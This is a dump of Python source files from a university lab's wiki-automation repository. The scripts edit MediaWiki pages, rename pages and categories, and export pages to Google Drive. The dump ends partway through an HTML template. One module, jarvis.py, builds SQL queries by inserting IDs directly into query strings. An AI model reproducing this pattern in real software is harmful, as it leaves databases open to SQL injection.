"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport sys\nimport re\n\ndef newtext(name, content):\n return \"\"\"\n{{Self Report Measure\n|Name=%s\n|Reference=\n|Duration=\n|Cost=\n|License terms=\n|Constructs=\n|Studies using measure=\n}}\n==Author's Description==\n\nTODO\n\n==Brief Description for Publications==\n\nTODO: Here is the text you would paste in grants, papers, IRB protocols, and so on.\n\n==Sample questions==\n\nTODO\n\n==Materials==\n%s\n\n==Psychometrics==\n\n==Discussion==\n\n===Internal Findings===\n\n===Publications With Relevant Findings===\n\n\n{{RSC.css}}\n[[Category:Self Report Measure]]\n \"\"\" % (name, content)\n\ndef run(mother):\n library = mother.pages[\"Self-Report Library\"]\n p = mwparserfromhell.parse(library.text())\n for link in p.filter_wikilinks():\n if \"[[:Category\" in link: continue\n title = str(link.title).replace(\"_\", \" \")\n page = mother.pages[title]\n if page.exists:\n measure = mwparserfromhell.parse(page.text())\n\n if \"[[Category:Self Report Measure]]\" in measure: continue\n if \"#REDIRECT\" in measure: continue\n\n logging.info(\"Updating page\", title)\n\n # trim out link to Self-Report Library, not needed in category mode\n for measure_link in measure.filter_wikilinks():\n if \"Library\" in measure_link.title \\\n and \"Self\" in measure_link.title \\\n and \"Report\" in measure_link.title:\n measure.remove(measure_link)\n\n # Fix whitespace\n trimmed = re.sub(\"\\n{2,}\", str(measure), \"\\n\\n\").strip()\n\n output = newtext(title, trimmed)\n page.save(output, \"Automated edit to move self reports into category\")\n\n\n"
},
{
"alpha_fraction": 0.5891583561897278,
"alphanum_fraction": 0.5891583561897278,
"avg_line_length": 40.20588302612305,
"blob_id": "4901e8d1361c06d2578bb7e217af76af510acef4",
"content_id": "0cabb9edf77e8ecf60bf3658e06f474b772f1881",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1402,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 34,
"path": "/renameregex.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\n\ndef run(mother, matching, regex, replacement):\n logging.info(f\"Renaming pages matching `{matching}` replacing `{regex}` with `{replacement}`\")\n hits = mother.search(matching, what=\"title\")\n matcher = re.compile(matching)\n for hit in list(hits):\n title = hit.get('title')\n if not matcher.match(title):\n logging.debug(f\"Skipping hit {title}\")\n continue\n logging.info(f\"Checking page {title}\")\n page = mother.pages[title]\n # NOTE: Checking page.redirects_to was throwing API errors.\n if \"#REDIRECT\" in page.text():\n continue\n logging.info(f\"Page is not a redirect\")\n name = page.name\n regex = re.compile(regex)\n new_name = regex.sub(replacement, name)\n if name != new_name:\n logging.info(f\"Renaming `{name}` to `{new_name}`\")\n # Check for a redirect or existing page at new name\n existing_page = mother.pages[new_name]\n if existing_page:\n if \"#REDIRECT\" in existing_page.text():\n logging.warning(f\"Deleting existing redirect at `{new_name}`\")\n existing_page.delete()\n else:\n logging.warning(f\"Could not rename, there is already a page at `{new_name}`\")\n page.move(new_name)\n\n"
},
{
"alpha_fraction": 0.5091946721076965,
"alphanum_fraction": 0.5091946721076965,
"avg_line_length": 29.921567916870117,
"blob_id": "6e9af466e425ca1764167404fb1cedb5ae757f55",
"content_id": "0309eac482e5ba0e3c21df57e7bb4aa0d470cd7b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 51,
"path": "/gdocmappings.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import os\nimport json\n\nclass GDocMappings:\n def __init__(self, path):\n self.path = path\n if os.path.exists(path):\n with open(path) as json_file:\n data = json.load(json_file)\n self.title_to_id = data['title_to_id']\n self.id_to_title = data['id_to_title']\n self.ids_that_link_to_id = data['ids_that_link_to_id']\n self.do_not_convert = data['do_not_convert']\n self.file_to_id = data['file_to_id']\n\n else:\n self.title_to_id = {}\n self.id_to_title = {}\n self.ids_that_link_to_id = {}\n self.do_not_convert = []\n self.file_to_id = {}\n\n def save(self):\n data = {\n 'title_to_id': self.title_to_id,\n 'id_to_title': self.id_to_title,\n 'ids_that_link_to_id': self.ids_that_link_to_id,\n 'do_not_convert': self.do_not_convert,\n 'file_to_id': self.file_to_id,\n }\n\n with open(self.path, 'w') as f:\n json.dump(data, f)\n\n def add(self, title, document_id):\n title = self.normalize(title)\n self.title_to_id[title] = document_id\n self.id_to_title[document_id] = title\n self.save()\n\n \n def normalize(self, title):\n # NOTE: Probably more stuff here\n return title.replace(\"_\", \" \")\n\n def get_id_for_title(self, title):\n title = self.normalize(title)\n if title in self.title_to_id:\n return self.title_to_id[title]\n else:\n return None\n"
},
{
"alpha_fraction": 0.4920158088207245,
"alphanum_fraction": 0.493438720703125,
"avg_line_length": 40.33333206176758,
"blob_id": "ef8f0ee233b1d52c86b13b01f1154eb9be46207e",
"content_id": "97a5c1f78361f41e45476403e8f6a7575e29e69c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6325,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 153,
"path": "/gdoclinks.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import logging\nimport re\nimport urllib.parse\nfrom apiclient.http import MediaFileUpload\nfrom apiclient.errors import HttpError\n\nGOOGLE_DOCS_PREFIX = \"https://docs.google.com/document/d/\"\nGOOGLE_DRIVE_PREFIX = \"https://drive.google.com/file/d/\"\n\nclass GDocLinks:\n def __init__(self, wiki, driver, file_prefix, folder_id):\n \"\"\"\n Needs a mwclient wiki connection, a GDocDriver, a file_prefix where we \n can stash files, the mappings so we can save what links to what and \n what file IDs represent what wiki files, and the folder_id in Drive to \n store new files\n \"\"\"\n self.wiki = wiki\n self.driver = driver\n self.file_prefix = file_prefix\n self.mappings = driver.mappings\n self.folder_id = folder_id\n\n\n def check_links(self, doc_id):\n \"\"\"\n Updates any links with \"wiki://\" prefixes if they exist in the \n driver's mappings to the resulting doc or file ID\n \"\"\"\n logging.info(f\"Re-linking inside doc {doc_id}\")\n try:\n document = self.driver.get_document(doc_id)\n except HttpError as e:\n logging.warning(f\"HttpError when trying to read doc {doc_id}: {e}\")\n return\n\n content = document['body']['content']\n requests = []\n\n doc_id_regex = re.compile('docs.google.com/document/d/([^/]{40,})', re.IGNORECASE)\n category_regex = re.compile(r'[^a-zA-Z0-9.!@$%&*()/]', re.IGNORECASE)\n\n # Now we walk the AST looking for links\n # Links are stored as 'link' properties inside the 'textStyle'\n # properties of 'textRun' elements.\n def check_for_link(element, start_index, end_index):\n if not 'link' in element:\n return False\n\n link = element['link']\n if 'url' in link:\n url = link['url']\n else:\n return False\n\n if url.startswith(\"wiki://\"):\n # Check in mappings for something with that title\n _, title = url.split(\"://\", 2)\n\n # Regularize the title\n title = title.replace(\"Media:\", \"File:\")\n title = title.lstrip(\":\")\n\n if title.startswith(\"File:\"):\n # Title is... 
sometimes URI encoded\n clean_title = urllib.parse.unquote(title)\n\n if clean_title in self.mappings.file_to_id:\n file_url = GOOGLE_DRIVE_PREFIX + self.mappings.file_to_id[clean_title]\n else:\n # TODO: Merge this stuff into a central place so initial conversion can do it, too?\n # Bring file over, store in mappings\n filename = self.file_prefix + \"/\" + clean_title\n try:\n logging.debug(f\"Downloading wiki file {clean_title} to {filename}\")\n wiki_file = self.wiki.pages[clean_title]\n with open(filename, 'wb') as fd:\n wiki_file.download(fd)\n except KeyError as e:\n logging.warning(f\"File '{title}' cleaned as '{clean_title}' not found in wiki when checking links in {doc_id}\")\n return False\n\n file_metadata = {\n 'name': clean_title.replace(\"File:\", \"\"),\n 'mimeType': '*/*',\n 'parents': [self.folder_id],\n }\n media = MediaFileUpload(filename,\n mimetype='*/*',\n resumable=True)\n\n result = self.driver.drive.files().create(\n body=file_metadata,\n media_body=media,\n supportsAllDrives=True,\n fields='id').execute()\n file_id = result.get('id')\n\n self.mappings.file_to_id[clean_title] = file_id\n file_url = GOOGLE_DRIVE_PREFIX + file_id\n\n logging.info(f\"Linking {title}, cleaned as {clean_title}, to {file_url}\")\n request = self.fix_link(start_index, end_index, file_url)\n requests.append(request)\n\n elif \"Category:\" in title:\n _, category = url.split(\"Category:\", 2)\n category = category.strip()\n category = category_regex.sub(\"-\", category)\n self.driver.add_tag(doc_id, category)\n\n elif title in self.mappings.title_to_id:\n doc_url = GOOGLE_DOCS_PREFIX + self.mappings.title_to_id[title]\n request = self.fix_link(start_index, end_index, doc_url)\n requests.append(request)\n\n else:\n match = doc_id_regex.search(url)\n if match:\n # Track this link in our mappings\n link_doc_id = match.group(1)\n if not link_doc_id in self.mappings.ids_that_link_to_id:\n self.mappings.ids_that_link_to_id[link_doc_id] = []\n\n if not doc_id in self.mappings.ids_that_link_to_id[link_doc_id]:\n self.mappings.ids_that_link_to_id[link_doc_id].append(doc_id)\n\n for item in content:\n self.driver.traverse(check_for_link, item, 0, 0)\n\n # Because indexes and content aren't changing through these edits,\n # we can send them as a batch in any order, hooray\n if requests:\n logging.info(f\"Found {len(requests)} links in need of updating, sending batch\")\n self.driver.batch_update(doc_id, requests)\n self.mappings.save()\n\n\n def fix_link(self, start_index, end_index, url):\n return {\n \"updateTextStyle\": {\n \"textStyle\": {\n \"link\": {\n \"url\": url\n }\n },\n \"range\": {\n \"startIndex\": start_index,\n \"endIndex\": end_index\n },\n \"fields\": \"link\"\n }\n }\n\n"
},
{
"alpha_fraction": 0.5512629747390747,
"alphanum_fraction": 0.5532441735267639,
"avg_line_length": 37.82692337036133,
"blob_id": "38f10be7a6e58aea21e3446caf64b38c7ff77347",
"content_id": "fe828923063ebd62b2758a6a52f6ab3b52cc98c2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4038,
"license_type": "permissive",
"max_line_length": 196,
"num_lines": 104,
"path": "/selfreportlibrary.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\n\n# Adds cost, duration, and item info to construct list for each measure \ndef details(mpage):\n mtext = mpage.text()\n mp = mwparserfromhell.parse(mtext)\n cost = \"\"\n duration = \"\"\n items = \"\"\n for template in mp.filter_templates():\n if template.has(\"Cost\"):\n cost = template.get(\"Cost\").value.strip()\n if '[' in cost:\n url = re.findall(r'(https?://\\S+)', cost)\n cost = \"[\" + url[0] + \"]\"\n if \".pdf\" in url[0]:\n cost = \"[\" + url[0]\n if cost != \"\":\n cost = \"Cost: \" + cost\n if template.has(\"Duration\"):\n duration = template.get(\"Duration\").value.strip()\n if duration != \"\":\n duration = \"Duration: \" + duration\n if template.has(\"Number of items\"):\n items = template.get(\"Number of items\").value.strip()\n if items != \"\":\n items = \"Items: \" + items\n info = [cost, duration, items]\n inf = [value for value in info if value]\n return inf\n return []\n \n\ndef run(mother):\n category = mother.categories['Self Report Measure']\n constructs = {}\n has_constructs = []\n missing_constructs = []\n for page in category:\n logging.debug(\"Checking self report\", page.name)\n text = page.text()\n p = mwparserfromhell.parse(text)\n for template in p.filter_templates():\n if template.has(\"Constructs\"):\n s = template.get(\"Constructs\").value.strip()\n if s == \"\": continue\n words = re.split(r',\\s*', s)\n for c in words:\n constructs[c] = constructs.get(c, [])\n constructs[c].append(page.name)\n has_constructs.append(page.name)\n\n if not page.name in has_constructs:\n missing_constructs.append(page.name)\n\n logging.debug(\"Got constructs: \", constructs)\n\n # Now constructs contains a hash of construct -> list of pages.\n # NOTE: This re-uses MediaWiki's category CSS classes to get three-column display. Maybe weird to do that?\n oldtext = category.text()\n cat = mwparserfromhell.parse(oldtext)\n sections = cat.get_sections()\n title = \"== Sorted by Construct ==\"\n newtext = title + \"\\n\\nPlease note: this section is created automatically based on the constructs in each measure's infobox. 
To edit, go to the measure's page and choose 'Edit with form'.\\n\\n\"\n newtext += \"<div class='mw-category'>\"\n\n # Build up an index by construct\n for k in sorted(constructs.keys()):\n newtext += \"<div class='mw-category-group'><h3>\" + k + \"</h3>\\n\"\n for measure in constructs[k]:\n mpage = mother.pages[measure]\n inf = details(mpage)\n # Only add measure info if it exists in page template\n if inf != []:\n newtext += \"* [[\" + measure + \"]] - (\" + \", \".join(inf) + \")\\n\"\n else :\n newtext += \"* [[\" + measure + \"]]\\n\"\n newtext += \"</div>\"\n \n # List out things that are missing constructs\n newtext += \"<div class='mw-category-group'><h3>No constructs listed</h3>\\n\"\n for m in missing_constructs:\n mpage = mother.pages[m]\n inf = details(mpage)\n # Only add measure info if it exists in page template\n if inf != []:\n newtext += \"* [[\" + m + \"]] - (\" + \", \".join(inf) + \")\\n\"\n else:\n newtext += \"* [[\" + m + \"]]\\n\"\n newtext += \"</div>\"\n\n newtext += \"</div>\\n\\n\"\n \n # Replace the \"Sorted by Construct\" section with our new text\n old_section = cat.get_sections(matches = \"Sorted by Construct\")[0]\n cat.replace(old_section, newtext)\n newpage = str(cat)\n\n if oldtext != newpage:\n logging.warning(\"Updating self-report category page, change detected\")\n category.save(newpage, \"Automated edit to build construct categories on self-report library\")\n"
},
{
"alpha_fraction": 0.6653696298599243,
"alphanum_fraction": 0.6653696298599243,
"avg_line_length": 41.75,
"blob_id": "58bb51a2e6b53a0ebbbede63b980d50cc613d54d",
"content_id": "94a2687e4b1841f2461545a58ba15444a2ac95e3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 514,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 12,
"path": "/addcategory.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\n\ndef run(mother, category_name, matching):\n logging.info(f\"Adding category `{category_name}` to pages matching `{matching}`\")\n hits = mother.search(matching, what=\"title\")\n for hit in list(hits):\n page = mother.pages[hit.get('title')]\n if not category_name in page.categories() and not page.redirects_to():\n logging.info(f\"Adding `{category_name}` to `{page.name}`\")\n page.append(f\"[[Category:{category_name}]]\")\n\n"
},
{
"alpha_fraction": 0.7219335436820984,
"alphanum_fraction": 0.7279168367385864,
"avg_line_length": 51.057376861572266,
"blob_id": "9bc243318e4f31580c76ef19441b0a9c1bab86b3",
"content_id": "1c1e63b3e5d899e0e1b45d90ca79b5d4ddedd7b2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6351,
"license_type": "permissive",
"max_line_length": 412,
"num_lines": 122,
"path": "/factuator.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import argparse\nimport logging\nimport coloredlogs\n\nimport mwclient\nimport mwparserfromhell\n\nimport auth_store\n\nparser = argparse.ArgumentParser(description='Automate the wiki.')\nparser.add_argument('-v', '--verbose', action='count')\nparser.add_argument('-s', '--study', help='Update study pages', action='store_true')\nparser.add_argument('--selfreport', help='Create initial self report pages (DO NOT RUN, for one-time use)', action='store_true')\nparser.add_argument('--selfreportlibrary', help='Update self report library', action='store_true')\nparser.add_argument('--medialinks-category', help='Update File: to Media: links in given category', action='append')\nparser.add_argument('--medialinks-page', help='Update File: to Media: links on given page', action='append')\nparser.add_argument('--redirectlinks-page', help='Update redirected links in given pages', action='append')\nparser.add_argument('--redirectlinks-category', help='Update redirected links in category')\nparser.add_argument('--studylibrary', help='Update study library', action='store_true')\nparser.add_argument('--studyimporter', metavar=\"CSV\", help='Create study pages from given tsv')\nparser.add_argument('--timeline', help='Create or update timeline page based on Category:Study, Category:Project, and Category:Grant', action='store_true')\nparser.add_argument('--studyreport', help='Generate CSV report about studies', action='store_true')\nparser.add_argument('--add-category', nargs=2, metavar=('category', 'match'), help='Add category `category` to pages with `match` in the title')\nparser.add_argument('--rename-category', nargs=2, metavar=('old', 'new'), help='Rename category `old` to `new`')\nparser.add_argument('--rename-regex', nargs=3, metavar=('match', 'regex', 'result'), help='Rename all pages with `match` in the title replacing `regex` with `result`')\nparser.add_argument('--export-gdoc', nargs=5, metavar=('wiki_prefix', 'file_prefix', 'http_prefix', 'drive_id', 'unsorted_folder_id'), help='Export wiki with `wiki_prefix` to google drive at `drive_id` creating unsorted folders in `unsorted_folder_id` for eventual gdocwiki use where `file_prefix` allows public-internet-visible viewing of files at `http_prefix` [EXPERIMENTAL]')\nparser.add_argument('--export-gdoc-single', nargs=6, metavar=('wiki_prefix', 'file_prefix', 'http_prefix', 'drive_id', 'unsorted_folder_id', 'page_title'), help='Export single wiki page with `wiki_prefix` to google drive at `drive_id` creating unsorted folders in `unsorted_folder_id` for eventual gdocwiki use where `file_prefix` allows public-internet-visible viewing of files at `http_prefix` [EXPERIMENTAL]')\nparser.add_argument('--link-gdoc', nargs=4, metavar=('file_prefix', 'drive_id', 'files_folder_id', 'folder_id'), help='Walk folder with `folder_id` and repair links based on stored mappings [EXPERIMENTAL]')\nparser.add_argument('--link-gdoc-single', nargs=4, metavar=('file_prefix', 'drive_id', 'files_folder_id', 'doc_id'), help='Repair links in doc based on stored mappings [EXPERIMENTAL]')\nparser.add_argument('-f', '--force', help='Force whatever changes instead of trying to be precise about updates', action='store_true')\nparser.add_argument('-n', '--older', metavar=\"ISO_DATE\", help='Update pages not updated since a given date')\nparser.add_argument('-a', '--all', help='Run all known automated updates', action='store_true')\nargs = parser.parse_args()\n\nif args.verbose:\n if args.verbose > 1:\n coloredlogs.install(level='DEBUG')\n elif args.verbose > 0:\n 
coloredlogs.install(level='INFO')\nelse:\n coloredlogs.install(level='WARN')\n\nauth = auth_store.get_auth()\nuser = auth[0]\n\nua = 'factuator/0.1 run by User:' + user\nmother = mwclient.Site('wiki.keck.waisman.wisc.edu', path='/wikis/mother/', httpauth=auth)\n\nif args.study:\n import study\n study.run(mother)\nelif args.selfreport:\n import selfreport\n selfreport.run(mother)\nelif args.selfreportlibrary:\n import selfreportlibrary\n selfreportlibrary.run(mother)\nelif args.medialinks_category:\n import medialinks\n medialinks.run_categories(mother, args.medialinks_category)\nelif args.medialinks_page:\n import medialinks\n medialinks.run_pages(mother, args.medialinks_page)\nelif args.redirectlinks_page:\n import redirectlinks\n redirectlinks.run_pages(mother, args.redirectlinks_page)\nelif args.redirectlinks_category:\n import redirectlinks\n redirectlinks.run_category(mother, args.redirectlinks_category)\nelif args.studyimporter:\n import studyimporter\n studyimporter.run(mother, args.studyimporter)\nelif args.studylibrary:\n import studylibrary\n studylibrary.run(mother)\nelif args.timeline:\n import timeline\n timeline.run(mother)\nelif args.studyreport:\n import studyreport\n studyreport.run(mother)\nelif args.add_category:\n import addcategory\n addcategory.run(mother, args.add_category[0], args.add_category[1])\nelif args.rename_category:\n import renamecategory\n renamecategory.run(mother, args.rename_category[0], args.rename_category[1])\nelif args.rename_regex:\n import renameregex\n renameregex.run(mother, args.rename_regex[0], args.rename_regex[1], args.rename_regex[2])\nelif args.all:\n import study\n study.run(mother)\n import studylibrary\n studylibrary.run(mother)\n import selfreportlibrary\n selfreportlibrary.run(mother)\n import timeline\n timeline.run(mother)\nelif args.export_gdoc:\n import gdocdriver\n gdocdriver.export_mediawiki(mother, args.export_gdoc[0],\n args.force, args.older,\n args.export_gdoc[1], args.export_gdoc[2],\n args.export_gdoc[3], args.export_gdoc[4])\nelif args.export_gdoc_single:\n import gdocdriver\n gdocdriver.export_mediawiki(mother, args.export_gdoc_single[0],\n args.force, args.older,\n args.export_gdoc_single[1], args.export_gdoc_single[2],\n args.export_gdoc_single[3], args.export_gdoc_single[4],\n args.export_gdoc_single[5])\nelif args.link_gdoc:\n import gdocdriver\n gdocdriver.link_folder(mother, args.link_gdoc[0], args.link_gdoc[1],\n args.link_gdoc[2], args.link_gdoc[3])\nelif args.link_gdoc_single:\n import gdocdriver\n gdocdriver.link_doc(mother, args.link_gdoc_single[0], args.link_gdoc_single[1], \n args.link_gdoc_single[2], args.link_gdoc_single[3])\nelse:\n parser.print_help()\n"
},
{
"alpha_fraction": 0.6572251319885254,
"alphanum_fraction": 0.6586653590202332,
"avg_line_length": 34.91379165649414,
"blob_id": "19c18211b40db6765f2ea0949c0a18234cff5c37",
"content_id": "19278dbdaa716e7d5e41b6892d12054290105a29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2083,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 58,
"path": "/studyimporter.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport csv\nimport sys\nfrom utilities import study_template\n\ndef importer(mother, row, boilerplate):\n title = row[\"Study Short Name\"]\n logging.info(\"Importing %s\" % title)\n\n page = mother.pages[title]\n oldtext = page.text()\n if oldtext != \"\":\n logging.warning(\"Collision on study page %s\" % title)\n return\n \n p = mwparserfromhell.parse(oldtext)\n\n p.insert(0, boilerplate)\n p.insert(0, \"{{Study}}\")\n\n template = study_template(p)\n template.add(\"AKA\", row[\"AKA\"])\n template.add(\"PIs\", row[\"PIs\"])\n template.add(\"Project Manager\", row[\"Project Manager\"])\n template.add(\"Current Contact\", row[\"Current Contact\"])\n template.add(\"Short Description\", row[\"Short Description\"])\n template.add(\"Website\", row[\"Website\"])\n template.add(\"Start Date\", row[\"Start Date\"])\n template.add(\"End Date\", row[\"End Date\"])\n template.add(\"Projected Enrollment\", row[\"Projected Enrollment\"])\n template.add(\"Current Enrollment\", row[\"Current Enrollment\"])\n template.add(\"Study Status\", row[\"Study Status\"])\n template.add(\"IRB Number\", row[\"IRB Number\"])\n template.add(\"Grant Number\", row[\"Grant Number\"])\n template.add(\"Funding Source\", row[\"Funding Source\"])\n template.add(\"ARROW URL\", row[\"ARROW URL\"])\n template.add(\"Study Drive Name\", row[\"Study Drive Name\"])\n if row[\"ClinicalTrials.Gov URL\"] != \"N/A\":\n template.add(\"ClinicalTrials.Gov\", row[\"ClinicalTrials.Gov URL\"])\n\n # insert into page at top section\n overview = row[\"General Overview Paragraph\"]\n if overview not in p:\n p.insert(0, overview)\n\n newtext = str(p)\n if oldtext != newtext:\n page.save(newtext, \"Automated edit to create page from metadata\")\n\ndef run(mother, csvpath):\n logging.info(\"Opening %s\" % csvpath)\n with open(csvpath) as csvfile:\n reader = csv.DictReader(csvfile, delimiter='\\t')\n boilerplate = mother.pages['Template:Study boilerplate'].text()\n for row in reader:\n importer(mother, row, boilerplate)\n"
},
{
"alpha_fraction": 0.5380875468254089,
"alphanum_fraction": 0.541329026222229,
"avg_line_length": 36.96154022216797,
"blob_id": "f49975b2702b06731f0961abcdd7ff29777c518d",
"content_id": "4abd5370bdd6b4a0f0c60c0e9ca356e45a325105",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4942,
"license_type": "permissive",
"max_line_length": 158,
"num_lines": 130,
"path": "/jarvis.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import psycopg2\nimport psycopg2.extras\n\n# NOTE: You will need to `kinit` a kerberos token to make this db connection work\n\nclass Jarvis:\n def __init__(self):\n self.db = psycopg2.connect(\"postgresql://togarashi.keck.waisman.wisc.edu/bi?krbsrvname=postgres\")\n\n def select(self, x):\n cursor = self.db.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cursor.execute(x)\n return cursor.fetchall()\n\n def select_list(self, x):\n cursor = self.db.cursor()\n cursor.execute(x)\n return cursor.fetchall()\n\n def columns(self, table):\n return self.select_list(\"select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME = '%s'\" % table)\n\n def tables(self):\n return self.select(\"select relname from pg_class where relkind='r' and relname !~ '^(pg_|sql_)';\")\n\n def study(self, study_id):\n return self.select(\"SELECT folder, name, current_subjects, total_subjects FROM studies WHERE id = %s\" % study_id)\n\n\n def quotas(self, study_id):\n return self.select(\"SELECT * FROM quotas where startdate < current_date AND enddate > current_date AND study_id = %s\" % study_id)\n\n def total_active_quota(self, study_id):\n return \"{}gb\".format(sum([quota['quotagb'] for quota in self.quotas(study_id)]))\n\n\n def protocols(self, study_id):\n return self.select(\"SELECT protocol, expiration FROM irb_protocols p JOIN irb_studies s ON p.id = s.irb_protocol_id WHERE s.study_id = %s\" % study_id)\n\n def irb_expirations(self, study_id):\n irbs = self.protocols(study_id)\n if len(irbs) == 1:\n return str(irbs[0][1])\n else:\n return \", \".join([\"{} expires {}\".format(p[0], p[1]) for p in irbs])\n\n\n def people(self, study_id):\n return self.select(\"\"\"SELECT p.id, p.first, p.last, ip.pi, ip.admin, ip.irb_alerts FROM irb_studies s\n JOIN irb_people ip ON ip.irb_protocol_id = s.irb_protocol_id\n JOIN people p on p.id = ip.person_id\n WHERE s.study_id = %s\n ORDER BY ip.pi DESC, ip.admin DESC, ip.irb_alerts DESC, ip.created_at ASC\"\"\" % study_id)\n\n def personnel(self, study_id):\n # We want a table of people and whether they are a PI, admin, and/or irb_alert_thinger\n # And now we also want groups\n\n group_info = self.select(\"\"\"SELECT concat(p.first, ' ', p.last), ag.name, ag.id FROM irb_studies s\n JOIN irb_protocols irb ON s.irb_protocol_id = irb.id\n JOIN irb_protocol_acgroups ipa ON irb.id = ipa.irb_protocol_id\n JOIN account_groups ag on ipa.acgroup_id = ag.id\n JOIN account_group_members gm on gm.group_id = ag.id\n JOIN account_groups ag2 on ag2.id = gm.member_id\n JOIN people p on ag2.person_id = p.id\n WHERE NOT ag2.isgroup AND p.first IS NOT NULL AND p.first != '' AND study_id = %s\n ORDER BY ag.id ASC, p.last ASC, p.first ASC\"\"\" % study_id)\n\n group_map = {}\n group_ids = {}\n all_groups = []\n people_map = {}\n all_people = []\n\n for p in self.people(study_id):\n name = \"{first} {last}\".format(**p)\n if not name in all_people:\n all_people.append(name)\n people_map[name] = p\n\n for x in group_info:\n name = x[0]\n group = x[1]\n group_ids[group] = x[2]\n if not name in all_people:\n all_people.append(name)\n if not group in all_groups:\n all_groups.append(group)\n if name in group_map:\n group_map[name].append(group)\n else:\n group_map[name] = [group]\n\n table = \"\"\"{| class=\"wikitable\" style=\"text-align:left;\"\\n!Name\\n!PI\\n!Admin\"\"\"\n for g in all_groups:\n table += \"\\n![https://brainimaging.waisman.wisc.edu/members/jarvis/account_groups/{} {}]\".format(group_ids[g], g)\n\n for name in all_people:\n table += \"\\n|-\\n\"\n table += 
\"\\n|\"\n\n if name in people_map:\n p = people_map[name]\n table += \"'''\" + name + \"'''\"\n \n table += \"\\n|\"\n if p['pi']:\n table += \"✓\"\n\n table += \"\\n|\"\n if p['admin']:\n table += \"✓\"\n\n else:\n table += name\n table += \"\\n|\"\n table += \"\\n|\"\n\n for g in all_groups:\n table += \"\\n|\"\n if name in group_map:\n if g in group_map[name]:\n table += \"✓\"\n\n table += \"\\n|}\"\n\n\n title = \"=== JARVIS Personnel ===\"\n link = \"\"\"This information is auto-populated from [https://brainimaging.waisman.wisc.edu/members/jarvis/studies/{} JARVIS].\"\"\".format(study_id)\n return title + \"\\n\\n\" + link + \"\\n\\n\" + table + \"\\n\\n\"\n\n"
},
{
"alpha_fraction": 0.5690776705741882,
"alphanum_fraction": 0.5809889435768127,
"avg_line_length": 34.943660736083984,
"blob_id": "ec1854b916c35dcda5f16a60d8e2d767b227d076",
"content_id": "5a9643db828f11fc6edf6f2fb55d50a23176ec2a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12763,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 355,
"path": "/timeline.py",
"repo_name": "uwmadison-chm/factuator",
"src_encoding": "UTF-8",
"text": "import mwclient\nimport mwparserfromhell\nimport logging\nimport re\nfrom datetime import date, datetime\nfrom dateutil.relativedelta import relativedelta\nfrom collections import defaultdict\nfrom functools import reduce\nimport operator\nimport sys\n\ntoday = datetime.today()\nten_months = relativedelta(months=10)\nsix_months = relativedelta(months=6)\ntwo_months = relativedelta(months=2)\n\nWIKI_URL = \"https://wiki.keck.waisman.wisc.edu/wikis/mother/index.php\"\n\nTO_EXTRACT = {\n 'Grant': [\n 'Letter of Intent Due', 'Submission Date',\n ],\n 'Project': [\n 'Planning Start Date',\n 'Project Start Date', 'Project End Date',\n ],\n 'Study': [\n 'Start Date', 'End Date',\n 'Planning Start Date', 'Piloting Start Date', 'Collecting Start Date',\n ],\n}\n\ndef color_for_bar_kind(bar_kind):\n if bar_kind == \"Planning\":\n return '#dae'\n if bar_kind == \"Piloting\":\n return '#ed8'\n if bar_kind == \"Collecting\":\n return '#aed'\n if bar_kind == \"Writing\":\n return '#daa'\n if bar_kind == \"Project\":\n return '#ade'\n return '#ccc'\n\ndef append_rows(normal_rows, truncated_rows, study, bar_kind, s, e):\n color = color_for_bar_kind(bar_kind)\n\n normal_rows.append(\"[ '{0}', '{1}', '{2}', new Date({3}, {4}, {5}), new Date({6}, {7}, {8})]\".format(\n study, bar_kind, color, s.year, s.month, s.day, e.year, e.month, e.day))\n\n if e <= today - two_months or s >= today + ten_months:\n return\n if e >= today + ten_months:\n e = today + ten_months\n if s <= today - two_months:\n s = today - two_months\n\n truncated_rows.append(\"[ '{0}', '{1}', '{2}', new Date({3}, {4}, {5}), new Date({6}, {7}, {8})]\".format(\n study, bar_kind, color, s.year, s.month, s.day, e.year, e.month, e.day))\n\ndef make_html(title, markup):\n return \\\n\"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n<meta charset=\"utf-8\">\n<title>CHM Timelines: \"\"\" + title + \"\"\"</title>\n<style type=\"text/css\">\nbody {\n font-family: sans-serif;\n background-color: #eee;\n}\n\n.timeline-wrapper {\n overflow-x: scroll;\n overflow-y: scroll;\n width: 100%;\n min-height: 100px;\n border: 1px solid 